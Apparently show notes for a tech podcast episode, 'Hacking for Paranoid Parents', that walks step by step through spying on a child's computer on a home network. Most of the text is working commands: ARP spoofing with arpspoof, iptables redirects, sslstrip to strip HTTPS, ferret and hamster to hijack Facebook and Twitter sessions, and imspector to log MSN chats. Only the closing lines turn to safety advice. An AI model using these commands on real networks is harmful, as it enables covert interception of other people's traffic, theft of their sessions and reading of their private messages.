episode 007 – Hacking for Paranoid Parents

After a recent issue with the online activities of a junior member of the Burgin household, I take a look at what a less balanced and paranoid parent could do to snoop on their kids online. Firstly I need to get the tools so I install backtrack linux and start the following to enable the network and make it forward packets:

start-network
startx
echo 1 > /proc/sys/net/ipv4/ip_forward

Next we tell the gateway I’m juniorburgins pc (192.168.2.53) and juniorburgins pc I’m the gateway (192.168.2.1)

arpspoof -i eth0 -t 192.168.2.53 192.168.2.1

Then I setup up the firewall rules to allow web trafic to flow and start sslstrip to strip ssl encoding

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
sslstrip -p -k -f

Leave that running and in a new shell set ferret grabbing data from the network

/pentest/sniffers/hamster/ferret -i eth0

Next start a webserver that shows me what ferret has found

/pentest/sniffers/hamster/hamster

Set Firefox to use the proxy on port 1234 and then http://hamster/ and let the paranoia commence. Here I snoop on facebook and then sidejack twitter.
Now I resort to snooping on MSN using imspector:

wget http://www.imspector.org/downloads/imspector-0.9.tar.gz
tar -zxvf imspector-0.9.tar.gz
cd imspector-0.9
make
make install

Lets start it up…

iptables -t nat -A PREROUTING -p tcp –destination-port 1863 -j REDIRECT –to-ports 16667
imspector -d

Wait whilst theres some chater and checkout the contents of:

/var/log/imspector/MSN/

Now remember, prevention is better than cure so before you resort to all this teach the kids that staying safe on line is a serious business and it’s not just about what information you share, it’s also what you take – so beware of malware and take care of your pc.